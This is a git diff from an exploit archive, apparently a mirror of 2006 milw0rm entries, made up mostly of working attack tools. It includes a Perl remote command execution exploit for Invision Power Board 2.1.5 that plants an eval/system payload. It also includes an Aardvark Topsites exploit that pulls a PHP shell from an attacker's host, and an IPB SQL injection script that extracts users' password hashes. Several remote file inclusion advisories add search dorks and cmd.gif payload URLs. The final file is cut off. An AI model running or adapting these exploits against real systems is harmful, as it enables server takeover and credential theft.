"HTTP Location: ".$res->header("Location")."\n"; - print "Topic Index: ".$topic_index."\n"; - my ($error) = $res->content() =~ m/<body>(.*?)<\/body>/s; - print "- ERROR -\nFind string: none\n$error\n- ERROR -\n"; - } - -} - -sub ipb_delete { - my ($fid, $tid) = @_; - my $req; - print 
"Deleting Topic: $tid from forum: $fid\n" if $debug; - - my $h = $host."/index.php"; - $req = POST $h, [ - 'st' => 0, - 'act' => 'mod', - 'f' => $fid, - 'auth_key' => $md5_key, - 'CODE' => '08', - 't' => $tid, - 'submit' => 'Delete this topic' - ]; # fuck windows automatic reboot - print $req->as_string() if $debug; - $ua->proxy(['http'] => $proxy) if $proxy; - $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user; - - my $res = $ua->request($req); - - if ($errors) { - print "[+] Context: Deleting Topic\n"; - print "HTTP Error code: ".$res->code()."\n"; - print "HTTP Location: ".$res->header("Location")."\n"; - print "Topic Index: ".$topic_index."\n"; - my ($error) = $res->content() =~ m/<body>(.*?)<\/body>/s; - print "- ERROR -\nFind string: ".$lang_strings{'deleted'}."\n$error\n- ERROR -\n"; - } - # yow yow - if ($res->code() eq 200) { - if ($res->content() =~ /$lang_strings{'deleted'}/) { - print "Topic $topic_index deleted\n" if $errors; - } else { - print "Maybe there was errors deleting post: $topic_index\n" if $errors; - } - } -} - -# shhhhh this is hidden -sub ipb_exec { - my ($cmd) = @_; - my $h = $host."/index.php?act=Search&CODE=01"; - my $req = POST $h, [ - 'keywords' => "HTTP_".$tmp_var, - 'namesearch' => '', - 'forums[]' => $forum_index, - 'prune' => 0, - 'prune_type' => 'newer', - 'result_type' => 'posts', - 'search_in' => 'posts', - 'sort_key' => 'last_post', - 'searchsubs' => '1' - ]; - print $req->as_string() if $debug; - $ua->proxy(['http'] => $proxy) if $proxy; - $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user; - - my $res = $ua->request($req); - my $html = $res->content(); - - my ($redir) = $html =~ m/url_bit.*?\"(.*?)\"/; - print "Redirect to: $redir\n" if $errors; # don't ask - - if ($errors) { - print "[+] Context: First search\n"; - print "HTTP Error code: ".$res->code()."\n"; - print "HTTP Location: ".$res->header("Location")."\n"; - print "Topic Index: ".$topic_index."\n"; - my ($error) = 
$res->content() =~ m/<body>(.*?)<\/body>/s; - print "- ERROR -\nFind string: none\n$error\n- ERROR -\n"; - } - - if ($res->code eq 302) { - $redir = $res->header("Location"); - } - - # piere - tonite is a great song - my $req = HTTP::Request->new (GET => $redir.'&lastdate=z|eval.*?%20//)%23e%00'); - $ua->proxy(['http'] => $proxy) if $proxy; - $req->header($tmp_var => 'echo STARTXPL;'.$cmd.';echo ENDXPL'); - $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user; - - print $req->as_string() if $debug; - - my $res = $ua->request($req); - my $html = $res->content(); - - $html =~ m/STARTXPL(.*?)ENDXPL/s; - print $1."\n"; - - # no matter with you - if ($errors) { - print "[+] Context: Executed\n"; - print "HTTP Error code: ".$res->code()."\n"; - print "HTTP Location: ".$res->header("Location")."\n"; - print "Topic Index: ".$topic_index."\n"; - my ($error) = $res->content() =~ m/<body>(.*?)<\/body>/s; - print "- ERROR -\nFind string: none\n$error\n- ERROR -\n"; - } - -} -# be aware with la roca peoplee - -# milw0rm.com [2006-04-29] +#!/usr/bin/perl +# Wed Apr 26 16:44:15 CEST 2006 jolascoaga@514.es +# +# INVISION POWER BOARD 2.1.5 <www.invisionboard.com> pr00f 0f c0ncept +# +# remote command execution. vuln credits goes to IceShaman. +# +# works only if you have perms to post a comment. Exploit with replye is +# in my TODO... +# +# 514 still r0xing. 
+# !dSR the hardc0re hax0rs ;) +# There is no kwel comments in this release, wait for next upgrade +#######################################################################/ + +use LWP::UserAgent; +use HTTP::Cookies; +use LWP::Simple; +use HTTP::Request::Common "POST"; +use HTTP::Response; +use Getopt::Long; +use strict; + +$| = 1; # ;1 = |$ + +my ($proxy,$proxy_user,$proxy_pass,$lang); +my ($arg_host,$debug,$ipb_user,$ipb_pass, $lang, $errors, $topic_index, $tmp_var); +my ($md5_key, $post_key, $tmp_var); + +my %lang_es = ( + 'name' => 'Spanish Language', + 'login' => "Ahora estás identificado", + 'incorrect' => "Nombre de usuario o contraseña incorrectos", + 'deleted' => "Tema Eliminado" +); + +my %lang_en = ( + 'name' => 'English language', + 'login' => "You are now logged in", + 'incorrect' => "Sorry, we could not find a member using those log in details", + 'deleted' => 'Topic Deleted', +); +my %lang_strings = (); + +my $ua = new LWP::UserAgent( + cookie_jar=> { file => "$$.cookie" }); + +my $options = GetOptions ( + 'host=s' => \$arg_host, + 'proxy=s' => \$proxy, + 'proxy_user=s' => \$proxy_user, + 'proxy_pass=s' => \$proxy_pass, + 'ipb_user=s' => \$ipb_user, + 'ipb_pass=s' => \$ipb_pass, + 'lang=s' => \$lang, + 'errors' => \$errors, + 'debug' => \$debug); + +my ($host, $forum_index) = $arg_host =~ m/(http.*?)index.*?showforum=(.*)/; +print "Host: $host\nForum Index: $forum_index\n" if $debug; + +&help unless ($host); + +# w0w0w0w0w0 is smarter than some one i know :D +if (!$lang) { + lang_autodetect(); + print "Detected lang is: $lang_strings{'name'}\n" if $debug; +} + +while (1){ + print "invvy:\\> "; + my $cmd = <STDIN>; + &invvy($cmd); +} + +sub invvy { + chomp (my $cmd = shift); + LWP::Debug::level('+') if $debug; + + $ua->agent("Morzilla/5.0 (THIS IS AN EXPLOIT. 
IDS, PLZ, Gr4b ME!!!"); + + $ua->proxy(['http'] => $proxy) if $proxy; + my $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user; + + ipb_login (); # This works with redirects enabled/disabled + + + ipb_post(); # Post in a main forum. + + ipb_exec ($cmd); + + ipb_delete ($forum_index, $topic_index); +} +# guglucitos team presents: + +sub help { + print "Syntax: ./$0 <url> [options]\n"; + print "\t--ipb_user, --ipb_pass (needed if dont allow anonymous posts)\n"; + print "\t--proxy (http), --proxy_user, --proxy_pass\n"; + print "\t--lang=[es|en] (default: autodetect)\n"; + print "\t--debug\n"; + print "\nExample\n"; + print "bash# $0 --host=http://www.somehost.com/index.php?showforum=2\n"; + print "\n"; + exit(1); +} + +# sponsorized by coca-cola +sub lang_autodetect { + + my $req = HTTP::Request->new (GET => $host."/index.php"); + $ua->proxy(['http'] => $proxy) if $proxy; + $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user; + + print $req->as_string() if $debug; + + my $res = $ua->request($req); + my $html = $res->content(); + + if (($html =~ /Bienvenido,/) or ($html =~ /Fecha y Hora actual/)) { + %lang_strings = %lang_es; + return; + } + if (($html =~ /Welcome,/) or ($html =~ /Time is now/)) { + %lang_strings = %lang_en; + return; + } + print "Unknown lang switching to default: 'english'\n"; + %lang_strings = %lang_en; +} + +# login function for 2.1.5 +sub ipb_login { + my $content; + my $h = $host."/index.php?act=Login&CODE=01"; + print $h . "\n" if $debug; + my $req = POST $h,[ + 'referer' => $host, + 'UserName' => $ipb_user, + 'PassWord' => $ipb_pass, + 'CookieDate' => 1 + ]; #grab these, and send to dsr! 
+ print $req->as_string() if $debug; + my $res = $ua->request($req); + if ($errors) { + print "[+] Context: Login in\n"; + print "HTTP Error code: ".$res->code()."\n"; + print "HTTP Location: ".$res->header("Location")."\n"; + my ($error) = $res->content() =~ m/<body>(.*?)<\/body>/s; + print "- ERROR -\nFind string: ".$lang_strings{'login'}."\n$error\n- ERROR -\n"; + } + if ($res->code() eq 302) { + $content = redirect ($res->header("Location")); + + } else { + + $content = $res->content(); + } + + if ($content =~ /$lang_strings{'login'}/ or $content =~ /Logged in as/) { + print "Logged in\n" if $errors; + } else { + die "Can't log in\n"; + } + +} + +sub redirect { + my ($addr) = @_; + my $req = HTTP::Request->new (GET => $addr); + $ua->proxy(['http'] => $proxy) if $proxy; + $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user; + + print $req->as_string() if $debug; # MKSINK is r0xer + + my $res = $ua->request($req); + my $html = $res->content(); + + return $html; +} + +sub ipb_post { + # This is for posting into a main index. 
+ + my $h = $host."/index.php?act=post&do=new_post&f=".$forum_index; + + my $req = HTTP::Request->new (GET => $h); + $ua->proxy(['http'] => $proxy) if $proxy; + $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user; + + print $req->as_string() if $debug; #dirty_epic r0x++ + + my $res = $ua->request($req); + my $html = $res->content(); + + ($md5_key) = $html =~ m/var ipb_md5_check\s+= \"(.*?)\"/; + ($post_key) = $html =~ m/post_key' value='(.*?)'/; + + print "AUTH check: $md5_key\n" if $debug; + print "POST key: $post_key\n" if $debug; + + $tmp_var = int(rand(31337)); + my $exploitme = 'eval(system(getenv(HTTP_'.$tmp_var.'))); //'; # seeeeeei la weeeeei + $h = $host."/index.php"; + + print $h."\n" if $debug; + + my $req = POST $h, [ + 'st' => 0, + 'act' => "Post", + 's' => '', + 'f' => $forum_index, + 'auth_key' => $md5_key, + 'removeattachid' => 0, + 'MAX_FILE_SIZE' => 51200000, + 'CODE' => '01', + 'post_key' => $post_key, + 'TopicTitle' => '514 pwned', + 'TopicDesc' => '', + 'poll_question' => '', + 'ffont' => 0, + 'fsize' => 0, + 'Post' => $exploitme, + 'post_htmlstatus' => 0, + 'enableemo' => 'yes', + 'enablesig' => 'yes', + 'mod_options' => 'nowt', + 'iconid' => 0, + 'dosubmit' => 'Post New Topic' + ]; + + $ua->proxy(['http'] => $proxy) if $proxy; + $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user; + + print $req->as_string() if $debug; + my $res = $ua->request($req); + my $html = $res->content(); + + print "Location: ".$res->header("Location") if $debug; + ($topic_index) = $res->header("Location") =~ m/showtopic=(\d+)/; + if ($errors) { + print "[+] Context: Creating post\n"; + print "HTTP Error code: ".$res->code()."\n"; + print "HTTP Location: ".$res->header("Location")."\n"; + print "Topic Index: ".$topic_index."\n"; + my ($error) = $res->content() =~ m/<body>(.*?)<\/body>/s; + print "- ERROR -\nFind string: none\n$error\n- ERROR -\n"; + } + +} + +sub ipb_delete { + my ($fid, $tid) = @_; + my $req; + print 
"Deleting Topic: $tid from forum: $fid\n" if $debug; + + my $h = $host."/index.php"; + $req = POST $h, [ + 'st' => 0, + 'act' => 'mod', + 'f' => $fid, + 'auth_key' => $md5_key, + 'CODE' => '08', + 't' => $tid, + 'submit' => 'Delete this topic' + ]; # fuck windows automatic reboot + print $req->as_string() if $debug; + $ua->proxy(['http'] => $proxy) if $proxy; + $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user; + + my $res = $ua->request($req); + + if ($errors) { + print "[+] Context: Deleting Topic\n"; + print "HTTP Error code: ".$res->code()."\n"; + print "HTTP Location: ".$res->header("Location")."\n"; + print "Topic Index: ".$topic_index."\n"; + my ($error) = $res->content() =~ m/<body>(.*?)<\/body>/s; + print "- ERROR -\nFind string: ".$lang_strings{'deleted'}."\n$error\n- ERROR -\n"; + } + # yow yow + if ($res->code() eq 200) { + if ($res->content() =~ /$lang_strings{'deleted'}/) { + print "Topic $topic_index deleted\n" if $errors; + } else { + print "Maybe there was errors deleting post: $topic_index\n" if $errors; + } + } +} + +# shhhhh this is hidden +sub ipb_exec { + my ($cmd) = @_; + my $h = $host."/index.php?act=Search&CODE=01"; + my $req = POST $h, [ + 'keywords' => "HTTP_".$tmp_var, + 'namesearch' => '', + 'forums[]' => $forum_index, + 'prune' => 0, + 'prune_type' => 'newer', + 'result_type' => 'posts', + 'search_in' => 'posts', + 'sort_key' => 'last_post', + 'searchsubs' => '1' + ]; + print $req->as_string() if $debug; + $ua->proxy(['http'] => $proxy) if $proxy; + $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user; + + my $res = $ua->request($req); + my $html = $res->content(); + + my ($redir) = $html =~ m/url_bit.*?\"(.*?)\"/; + print "Redirect to: $redir\n" if $errors; # don't ask + + if ($errors) { + print "[+] Context: First search\n"; + print "HTTP Error code: ".$res->code()."\n"; + print "HTTP Location: ".$res->header("Location")."\n"; + print "Topic Index: ".$topic_index."\n"; + my ($error) = 
$res->content() =~ m/<body>(.*?)<\/body>/s;
+ print "- ERROR -\nFind string: none\n$error\n- ERROR -\n";
+ }
+
+ if ($res->code eq 302) {
+ $redir = $res->header("Location");
+ }
+
+ # piere - tonite is a great song
+ my $req = HTTP::Request->new (GET => $redir.'&lastdate=z|eval.*?%20//)%23e%00');
+ $ua->proxy(['http'] => $proxy) if $proxy;
+ $req->header($tmp_var => 'echo STARTXPL;'.$cmd.';echo ENDXPL');
+ $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user;
+
+ print $req->as_string() if $debug;
+
+ my $res = $ua->request($req);
+ my $html = $res->content();
+
+ $html =~ m/STARTXPL(.*?)ENDXPL/s;
+ print $1."\n";
+
+ # no matter with you
+ if ($errors) {
+ print "[+] Context: Executed\n";
+ print "HTTP Error code: ".$res->code()."\n";
+ print "HTTP Location: ".$res->header("Location")."\n";
+ print "Topic Index: ".$topic_index."\n";
+ my ($error) = $res->content() =~ m/<body>(.*?)<\/body>/s;
+ print "- ERROR -\nFind string: none\n$error\n- ERROR -\n";
+ }
+
+}
+# be aware with la roca peoplee
+
+# milw0rm.com [2006-04-29]
diff --git a/platforms/php/webapps/1727.txt b/platforms/php/webapps/1727.txt
index d6a14fe55..c184c3fc0 100755
--- a/platforms/php/webapps/1727.txt
+++ b/platforms/php/webapps/1727.txt
@@ -1,8 +1,8 @@
-Title: OpenPHPNuke <= 2.3.3 Remote File Inclusion
-URL: http://www.openphpnuke.com/
-Dork: inurl:/system/article/alltopics.php OR inurl:/system/user/index.php
-Credits: [Oo]
-
-Exploit: /master.php?root_path=http://yourhost/cmd.gif?cmd=ls
-
-# milw0rm.com [2006-04-29]
+Title: OpenPHPNuke <= 2.3.3 Remote File Inclusion
+URL: http://www.openphpnuke.com/
+Dork: inurl:/system/article/alltopics.php OR inurl:/system/user/index.php
+Credits: [Oo]
+
+Exploit: /master.php?root_path=http://yourhost/cmd.gif?cmd=ls
+
+# milw0rm.com [2006-04-29]
diff --git a/platforms/php/webapps/1728.txt b/platforms/php/webapps/1728.txt
index c91d4fde8..81d10da7e 100755
--- a/platforms/php/webapps/1728.txt
+++ b/platforms/php/webapps/1728.txt
@@ -1,8 +1,8 @@
-Title: Knowledge Base Mod for PHPbb <= 2.0.2 remote file inclusion
-URL: http://www.phpbb2.de/dload.php?action=file&file_id=538
-Dork: "Powered by Knowledge Base"
-Credits: [Oo]
-
-Exploit: /includes/kb_constants.php?module_root_path=http://yourhost/cmd.gif?cmd=ls
-
-# milw0rm.com [2006-04-29]
+Title: Knowledge Base Mod for PHPbb <= 2.0.2 remote file inclusion
+URL: http://www.phpbb2.de/dload.php?action=file&file_id=538
+Dork: "Powered by Knowledge Base"
+Credits: [Oo]
+
+Exploit: /includes/kb_constants.php?module_root_path=http://yourhost/cmd.gif?cmd=ls
+
+# milw0rm.com [2006-04-29]
diff --git a/platforms/php/webapps/1729.txt b/platforms/php/webapps/1729.txt
index 900161612..5d4077bf7 100755
--- a/platforms/php/webapps/1729.txt
+++ b/platforms/php/webapps/1729.txt
@@ -1,8 +1,8 @@
-Title: Limbo CMS <= 1.04 Remote File Inclusion
-URL: http://www.limbo-cms.com/
-Dork: inurl:"index2.php?option=rss" OR "powered By Limbo CMS"
-Credits: [Oo]
-
-Exploit: /classes/adodbt/sql.php?classes_dir=http://yourhost/cmd.gif?cmd=ls
-
-# milw0rm.com [2006-04-29]
+Title: Limbo CMS <= 1.04 Remote File Inclusion
+URL: http://www.limbo-cms.com/
+Dork: inurl:"index2.php?option=rss" OR "powered By Limbo CMS"
+Credits: [Oo]
+
+Exploit: /classes/adodbt/sql.php?classes_dir=http://yourhost/cmd.gif?cmd=ls
+
+# milw0rm.com [2006-04-29]
diff --git a/platforms/php/webapps/1730.txt b/platforms/php/webapps/1730.txt
index 63319e42e..6d4359127 100755
--- a/platforms/php/webapps/1730.txt
+++ b/platforms/php/webapps/1730.txt
@@ -1,7 +1,7 @@
-Title: Aardvark Topsites PHP 4.2.2 remote file inclusion
-URL: http://www.aardvarktopsitesphp.com/
-Dork: "Powered By Aardvark Topsites PHP 4.2.2"
-
-Exploit: /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://yourhost/cmd.gif?cmd=ls
-
-# milw0rm.com [2006-04-30]
+Title: Aardvark Topsites PHP 4.2.2 remote file inclusion
+URL: http://www.aardvarktopsitesphp.com/
+Dork: "Powered By Aardvark Topsites PHP 4.2.2"
+
+Exploit: /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://yourhost/cmd.gif?cmd=ls
+
+# milw0rm.com [2006-04-30]
diff --git a/platforms/php/webapps/1731.txt b/platforms/php/webapps/1731.txt
index a211e9855..b288d483f 100755
--- a/platforms/php/webapps/1731.txt
+++ b/platforms/php/webapps/1731.txt
@@ -1,19 +1,19 @@
-Title: phpMyAgenda <=3.0 Final - Remote File Include Vulnerability
------------------------------------------------------------------
-Vendor: phpMyAgenda
-URL: http://phpmyagenda.com
------------------------------------------------------------------
-
-Credits:
-Discovered by: 'Aesthetico'
-http://www.majorsecurity.de
------------------------------------------------------------------
-Search for: "Powered by phpMyAgenda"
------------------------------------------------------------------
-
-Exploitation:
-
-/agenda.php3?rootagenda=http://www.yourspace.com/yourscript.php?
-/agenda2.php3?rootagenda=http://www.yourspace.com/yourscript.txt?
-
-# milw0rm.com [2006-04-30]
+Title: phpMyAgenda <=3.0 Final - Remote File Include Vulnerability
+-----------------------------------------------------------------
+Vendor: phpMyAgenda
+URL: http://phpmyagenda.com
+-----------------------------------------------------------------
+
+Credits:
+Discovered by: 'Aesthetico'
+http://www.majorsecurity.de
+-----------------------------------------------------------------
+Search for: "Powered by phpMyAgenda"
+-----------------------------------------------------------------
+
+Exploitation:
+
+/agenda.php3?rootagenda=http://www.yourspace.com/yourscript.php?
+/agenda2.php3?rootagenda=http://www.yourspace.com/yourscript.txt?
+
+# milw0rm.com [2006-04-30]
diff --git a/platforms/php/webapps/1732.pl b/platforms/php/webapps/1732.pl
index 99bb72c32..d0fd7bc59 100755
--- a/platforms/php/webapps/1732.pl
+++ b/platforms/php/webapps/1732.pl
@@ -1,94 +1,94 @@ -#!/usr/bin/perl -# -# Aardvark Topsites PHP <=4.2.2 Remote Command Execution Exploit -# -# Copyright (c) 2006 cijfer <cijfer@netti!fi> -# All rights reserved. -# -# never ctrl+c again. -# cijfer$ http://target.com/dir -# host changed to 'http://target.com/dir' -# cijfer$ -# -# to set your PHP shell location: -# cijfer$ shell=http://my.shell.fi/phpshell.gif?&cmd= -# php shell set to 'http://my.shell.fi/phpshell.gif?&cmd=' -# cijfer$ -# -# $Id: cijfer-atpxpl.pl,v 0.1 2006/04/30 02:11:00 cijfer Exp $ - -use strict; -use LWP::UserAgent; -use URI::Escape; -use Getopt::Long; -use Term::ANSIColor; - -my($command,$verbose,$proxy,$shell,$host,$res); - -$res = GetOptions("host=s" => \$host, "proxy=s" => \$proxy, "verbose+" => \$verbose); -&usage unless $host; - -while() -{ - print color("green"), "cijfer\# ", color("reset"); - chomp($command = <STDIN>); - exit unless $command; - if($command =~ m/^http:\/\/(.*)/g) - { - $host="http://".$1; - print "host changed to '"; - print color("bold"), $host."'\n", color("reset"); - } - elsif($command =~ m/^shell=http:\/\/(.*)/g) - { - $shell="http://".$1; - print "php shell set to '"; - print color("bold"), $shell."'\n", color("reset"); - } - else - { - &exploit($command,$host); - } -} - -sub usage -{ - print "Aardvark Topsites PHP <=4.2.2 Remote Command Execution Exploit\n"; - print "usage: $0 -hpv\n\n"; - print " -h, --host\t\tfull address of target (ex. http://www.website.com/directory)\n"; - print " -p, --proxy\t\tprovide an HTTP proxy (ex. 
0.0.0.0:8080)\n"; - print " -v, --verbose\t\tverbose mode (debug)\n\n"; - exit; -} - -sub exploit -{ - my($command,$host) = @_; - my($string,$execut,$recv,$sent,$out,$cij,@cij); - - $cij=LWP::UserAgent->new() or die; - $cij->agent("Mozilla/5.0 (X11; U; Linux i686; fi-FI; rv:2.0) Gecko/20060101"); - $cij->proxy("http", "http://".$proxy."/") unless !$proxy; - - $string = "%65%63%68%6F%20%5F%63%69%6A%66%65%72%5F%3B%20"; - $string .= uri_escape(shift); - $string .= "%3B%20%65%63%68%6F%20%5F%63%69%6A%66%65%72%5F"; - - $out=$cij->get($host."/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=".$shell.$string); - - if($out->is_success) - { - @cij=split("_cijfer_",$out->content); - print substr(@cij[1],1); - } - - if($verbose) - { - $recv=length $out->content; - print "Total received bytes: ".$recv."\n"; - $sent=length $command; - print "Total sent bytes: ".$sent."\n"; - } -} - -# milw0rm.com [2006-04-30] +#!/usr/bin/perl +# +# Aardvark Topsites PHP <=4.2.2 Remote Command Execution Exploit +# +# Copyright (c) 2006 cijfer <cijfer@netti!fi> +# All rights reserved. +# +# never ctrl+c again. 
+# cijfer$ http://target.com/dir +# host changed to 'http://target.com/dir' +# cijfer$ +# +# to set your PHP shell location: +# cijfer$ shell=http://my.shell.fi/phpshell.gif?&cmd= +# php shell set to 'http://my.shell.fi/phpshell.gif?&cmd=' +# cijfer$ +# +# $Id: cijfer-atpxpl.pl,v 0.1 2006/04/30 02:11:00 cijfer Exp $ + +use strict; +use LWP::UserAgent; +use URI::Escape; +use Getopt::Long; +use Term::ANSIColor; + +my($command,$verbose,$proxy,$shell,$host,$res); + +$res = GetOptions("host=s" => \$host, "proxy=s" => \$proxy, "verbose+" => \$verbose); +&usage unless $host; + +while() +{ + print color("green"), "cijfer\# ", color("reset"); + chomp($command = <STDIN>); + exit unless $command; + if($command =~ m/^http:\/\/(.*)/g) + { + $host="http://".$1; + print "host changed to '"; + print color("bold"), $host."'\n", color("reset"); + } + elsif($command =~ m/^shell=http:\/\/(.*)/g) + { + $shell="http://".$1; + print "php shell set to '"; + print color("bold"), $shell."'\n", color("reset"); + } + else + { + &exploit($command,$host); + } +} + +sub usage +{ + print "Aardvark Topsites PHP <=4.2.2 Remote Command Execution Exploit\n"; + print "usage: $0 -hpv\n\n"; + print " -h, --host\t\tfull address of target (ex. http://www.website.com/directory)\n"; + print " -p, --proxy\t\tprovide an HTTP proxy (ex. 
0.0.0.0:8080)\n"; + print " -v, --verbose\t\tverbose mode (debug)\n\n"; + exit; +} + +sub exploit +{ + my($command,$host) = @_; + my($string,$execut,$recv,$sent,$out,$cij,@cij); + + $cij=LWP::UserAgent->new() or die; + $cij->agent("Mozilla/5.0 (X11; U; Linux i686; fi-FI; rv:2.0) Gecko/20060101"); + $cij->proxy("http", "http://".$proxy."/") unless !$proxy; + + $string = "%65%63%68%6F%20%5F%63%69%6A%66%65%72%5F%3B%20"; + $string .= uri_escape(shift); + $string .= "%3B%20%65%63%68%6F%20%5F%63%69%6A%66%65%72%5F"; + + $out=$cij->get($host."/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=".$shell.$string); + + if($out->is_success) + { + @cij=split("_cijfer_",$out->content); + print substr(@cij[1],1); + } + + if($verbose) + { + $recv=length $out->content; + print "Total received bytes: ".$recv."\n"; + $sent=length $command; + print "Total sent bytes: ".$sent."\n"; + } +} + +# milw0rm.com [2006-04-30] diff --git a/platforms/php/webapps/1733.pl b/platforms/php/webapps/1733.pl index e6deb6241..2502ba2ec 100755 --- a/platforms/php/webapps/1733.pl +++ b/platforms/php/webapps/1733.pl 
@@ -1,187 +1,187 @@ -#!/usr/bin/perl -############################################################################# -## IPB <=2.1.4 exploit (possibly 2.1.5 too) ## -## Brought to you by the Ykstortion security team. ## -## ## -## The bug is in the pm system so you must have a registered user. ## -## The exploit will extract a password hash from the forum's data base of ## -## the target user. ## -## You need to know the target user's member ID but it's not difficult to ## -## find out, just look under their avatar next to one of their posts. ## -## Once you have the hash, simply unset all forum cookies and set ## -## member_id to the target user's member id and pass_hash to the hash ## -## obtained from the database by this script. ## -## ## -## Usage: ## -## $ ./ipb ## -## IPB Forum URL ? forums.example.com/forums ## -## Your username ? krypt_sk1dd13 ## -## Your pass ? if_your_on_nix_this_gets_hidden ## -## Target userid ? 3637 ## -## ## -## Attempting to extract password hash from database... ## -## 537ab2d5b37ac3a3632f5d06e8e04368 ## -## Hit enter to quit. ## -## ## -## Requirements: ## -## o Perl 5 ## -## o LWP 5.64 or later ## -## o Internet access ## -## o A forum you hate/dislike ## -## o A user on said forum ## -## o 32+ PMs left till your inbox is full, if not you can still delete ## -## PMs from your inbox as the successful ones come through ## -## ## -## Credit to: Nuticulus for finding the SQL injection ## -## ## -## Have fun, you dumb skiddie. ## -############################################################################# - -use HTTP::Cookies; -use LWP 5.64; -use HTTP::Request; - -# variables -my $login_page = '?act=Login&CODE=01'; -my $pm_page = '?act=Msg&CODE=04'; -my $pose_pm_page = '?'; -my $tries = 5; -my $sql = ''; -my $hash = ''; -my $need_null = 0; -my $i; -my $j; -my @charset = ('0' .. '9', 'a' .. 
'f'); -my %form = (act => 'Msg', - CODE => '04', - MODE => '01', - OID => '', - removeattachid => '', - msg_title => 'asdf', - bbmode => 'normal', - ffont => 0, - fsize => 0, - fcolor => 0, - LIST => ' LIST ', - helpbox => 'Insert Monotype Text (alt + p)', - tagcount => 0, - Post => 'jkl'); - - -# objects -my $ua = LWP::UserAgent->new; -my $cj = HTTP::Cookies->new (file => "N/A", autosave => 0); -my $resp; - -# init the cookie jar -$ua->cookie_jar ($cj); - -# allow redirects on post requests -push @{ $ua->requests_redirectable }, "POST"; - -# get user input -print 'IPB Forum URL ? '; -chomp (my $base_url = <STDIN>); -print 'Your username ? '; -chomp (my $user = <STDIN>); -$form{entered_name} = $user; -print 'Your pass ? '; -# systems without stty will error otherwise -my $stty = -x '/bin/stty'; -system 'stty -echo' if $stty; # to turn off echoing -chomp (my $pass = <STDIN>); -system 'stty echo' if $stty; # to turn it back on -print "\n" if $stty; -print 'Target userid ? '; # it'll say next to one of their posts -chomp (my $tid = <STDIN>); - -# parse the given base url -if ($base_url !~ m#^http://#) { $base_url = 'http://' . $base_url } -if ($base_url !~ m#/$|index\.php$#) { $base_url .= '/' } - -do { - $resp = $ua->post ($base_url . $login_page, - [ UserName => $user, - PassWord => $pass, - CookieDate => 1, - ]); -} while ($tries-- && !$resp->is_success()); - -# reset tries -$tries = 5; - -# did we get 200 (OK) ? -if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "\n" } - -# was the pass right ? -if ($resp->content =~ /sorry, the password was wrong/i) { - die "Error: password incorrect.\n"; -} - -# get ourselves a post_key (and an auth_key too with newer versions) -do { - $resp = $ua->get ($base_url . $pm_page); -} while ($tries-- && !$resp->is_success()); - -# reset tries -$tries = 5; - -if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . 
"\n" } -if ($resp->content =~ m#<input\s+?type=["']?hidden["']?\s+?name=["']?post_key["']?\s+?value=["']?([0-9a-f]{32})["']?\s+?/>#) -{ - $form{post_key} = $1; -} else { - die "Error: couldn't get a post key.\n"; -} -if ($resp->content =~ m#<input\s+?type=["']?hidden["']?\s+?name=["']?auth_key["']?\s+?value=["']?([0-9a-f]{32})["']?\s+/>#) -{ - $form{auth_key} = $1; -} - -# turn off buffering so chars in the hash show up straight away -$| = 1; - -print "\nAttempting to extract password hash from database...\n "; - -OFFSET: -for ($i = 0; $i < 32; ++$i) { - CHAR: - for ($j = 0; $j < @charset; ++$j) { - # reset tries - $tries = 5; - print "\x08", $charset[$j]; - # build sql injection - $sql = '-1 UNION SELECT ' . ($need_null ? '0, ' : '') . 'CHAR(' - . (join (',', map {ord} split ('', $user))) . ') FROM ' - . 'ibf_members WHERE id = ' . $tid . ' AND MID(' - . 'member_login_key, ' . ($i + 1) . ', 1) = CHAR(' - . ord ($charset[$j]) . ')'; - $form{from_contact} = $sql; - $resp = $ua->post ($base_url . $post_pm_page, \%form, - referer => $base_url . $pm_page); - if (!$resp->is_success()) { - die "\nError: " . $resp->status_line - . "\n" if (!$tries); - --$tries; - redo; - } - if ($resp->content =~ /sql error/i) { - if ($need_null) { - die "Error: SQL error.\n"; - } else { - $need_null = 1; - redo OFFSET; - } - } elsif ($resp->content !~ /there is no such member/i) { - # we have a winner ! - print ' '; - next OFFSET; - } - } - # uh oh, something went wrong - die "\nError: couldn't get a char for offset $i\n"; -} -print "\x08 \x08\nHit enter to quit.\n"; -<STDIN>; - -# milw0rm.com [2006-05-01] +#!/usr/bin/perl +############################################################################# +## IPB <=2.1.4 exploit (possibly 2.1.5 too) ## +## Brought to you by the Ykstortion security team. ## +## ## +## The bug is in the pm system so you must have a registered user. ## +## The exploit will extract a password hash from the forum's data base of ## +## the target user. 
## +## You need to know the target user's member ID but it's not difficult to ## +## find out, just look under their avatar next to one of their posts. ## +## Once you have the hash, simply unset all forum cookies and set ## +## member_id to the target user's member id and pass_hash to the hash ## +## obtained from the database by this script. ## +## ## +## Usage: ## +## $ ./ipb ## +## IPB Forum URL ? forums.example.com/forums ## +## Your username ? krypt_sk1dd13 ## +## Your pass ? if_your_on_nix_this_gets_hidden ## +## Target userid ? 3637 ## +## ## +## Attempting to extract password hash from database... ## +## 537ab2d5b37ac3a3632f5d06e8e04368 ## +## Hit enter to quit. ## +## ## +## Requirements: ## +## o Perl 5 ## +## o LWP 5.64 or later ## +## o Internet access ## +## o A forum you hate/dislike ## +## o A user on said forum ## +## o 32+ PMs left till your inbox is full, if not you can still delete ## +## PMs from your inbox as the successful ones come through ## +## ## +## Credit to: Nuticulus for finding the SQL injection ## +## ## +## Have fun, you dumb skiddie. ## +############################################################################# + +use HTTP::Cookies; +use LWP 5.64; +use HTTP::Request; + +# variables +my $login_page = '?act=Login&CODE=01'; +my $pm_page 